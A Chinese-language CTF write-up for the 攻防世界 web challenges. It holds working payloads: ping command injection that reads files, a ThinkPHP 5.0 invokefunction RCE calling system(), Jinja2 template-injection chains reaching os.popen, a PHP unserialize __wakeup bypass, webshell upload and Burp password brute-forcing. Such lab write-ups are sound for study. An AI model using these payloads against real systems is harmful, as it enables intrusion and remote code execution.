WP-攻防世界

攻防世界

新手练习区

一、view_source

 

 打开链接如上图所示，右键查看源代码失效，尝试F12查看，通过Elements发现flag，如下图所示。

 二、robots

点击题目所给链接，是一个空白界面，根据题目提示，查看robots.txt文件

 

 意思为允许所有用户访问f1ag_1s_h3re.php文件，尝试访问该文件获得flag

 

 三、backup

点击题目所给链接，如下图所示。

 

 尝试F12看看能否获得有效信息，查看后没有相关提示。此时，考虑使用工具扫描目录，使用dirmap进行目录扫描。

 

 依次访问三个目录，访问index.php.bak是下载了一个文件，打开文件发现flag

 

 四、cookie

点击题目所给链接，如下图所示：

 

根据提示，用burp抓包分析，包里面有提示去查看cookie.php

 

 访问cookie.php,如下图所示：

 

 根据提示去看response请求头，发现flag

 

 五、disabled_button

考察前端知识。访问题目所给链接，如下图所示：

 

 F12进入删除disabled，点击flag得到flag

 

 六、weak_auth

考察弱口令，使用burp爆破

点击题目所给链接

输入用户名admin密码admin抓包，发送到爆破

 

 加载常用密码字典进行爆破。

 

 爆破成功，看到flag

七、simple_php

=== 会同时比较字符串的值和类型

== 会先将字符串换成相同类型，再作比较，属于弱类型比较

点击题目所给链接

 

 根据代码提示，构造payload：?a=00&b=12345a，得到flag

 

 八、get post

 点击题目所给链接

 

 

 F12使用hackbar用get方式提交a=1

 

 

 再用post方式提交b=2

 

 

 九、xff_referer

打开页面提示

 

 

 用hackbar伪造X-Forwarded-For

 

 

 提交请求后页面显示如下;

 

 

  用hackbar伪造Referer

 

 

 

提交请求后得到flag

 

 

 十、webshell

打开题目链接

 

 

 根据题目提示，知道在index.php里面有webshell，密码为shell，直接用蚁剑尝试连接

 

 

 连接成功，发现flag.txt

 

 

 十一、command_execution

| 的作用为将前一个命令的结果传递给后一个命令作为输入

&&的作用是前一条命令执行成功时，才执行后一条命令

打开题目

 

 

 输127.0.0.1尝试，发现是一个ping命令，尝试使用|来进行命令拼接，构造payload，127.0.0.1| find / -name "flag.txt"

 

 

 用127.0.0.1| cat /home/flag.txt,得到flag

 

 十二、simple_js

 点击题目所给链接，在输入框输入密码后跳出错误提示

 

 这里是前端验证，无法爆破，右键查看源代码，发现不管输入什么密码都会报错，阅读代码发现关键代码

String["fromCharCode"](dechiffre("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"));

 

 对数组进行ascii编码

 

 

 

 根据题目提示，形成完整的flag

 高手进阶区

一、baby web

 打开题目所给环境

 

 

结合题目给的提示，尝试访问index.php界面，发现重定向到1.php，F12打开发现在Network里面的Headers里面看到flag

二、Training-WWW-Robots

打开题目所给环境

根据提示去访问robots.txt

 

 

 直接访问/f10g.php得到flag：cyberpeace{0a0274284c093de228187777293cbc4a}

三、php rce

打开环境，发现是一个thinkphp5.0，网上直接搜相关的poc

http://111.200.241.244:61326/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"

 

 直接查看flag      http://111.200.241.244:61326/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

 

 

四、Web_php_include

 

五、ics-06

六、warmup

七、NewsCenter

八、NaNNaNNaNNaN-Batman

九、PHP2

十、unserialize3

十一、upload1

打开题目，是一个文件上传，并且前端验证如果不是图片的话是会弹窗提示

随便选择一张图片上传，抓包

 

 对包的内容进行修改，删除图片的内容，修改上传文件的后缀名

 

 直接使用蚁剑连接，发现flag

 十二、Web_python_template_injection

打开题目所给环境，结合题目提示知道这是一个ssti服务端模板注入

利用http://111.200.241.244:63560/{{1+1}}，发现确实存在命令执行

 

 下面是payload用到的几个魔法函数

__class__:返回对象所属类

 

 __mro__:以元组返回继承链关系

 

 __subclasses__:以列表返回类的所有子类（查看object的子类）

 __init__:类的初始方法,用以初始化实例.实际上魔术方法__new__与__init__共同作为"构造函数",__new__先实例化类对象,而后__init__则用传入的参数来初始化实例.

__globals__(也可用func_globals):以字典返回内建模块

这个题目使用payload：''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('执行命令').read()即可

http://111.200.241.244:63560/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

 

 http://111.200.241.244:63560/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}

 Web_php_unserialize

打开题目环境，读代码

 

 发现是一个反序列化的题目，if循环里面利用正则表达式过滤了o或c后面接:接数字，反序列化是需要绕过__wakeup函数

    <?php 
    class Demo { 
        private $file = 'fl4g.php';
    }
     
    $a= serialize(new demo);
    $a= str_replace('O:4', 'O:+4',$a);//绕过preg_match
    $a= str_replace(':1:', ':2:',$a);//绕过wakeup
    echo base64_encode($a);//TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
    ?>

在线或者本地运行上面代码即可得到paylaod,再去利用get方式提交即可得到flag

 

 ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}

supersqli

BUUCTF上面有一样的题目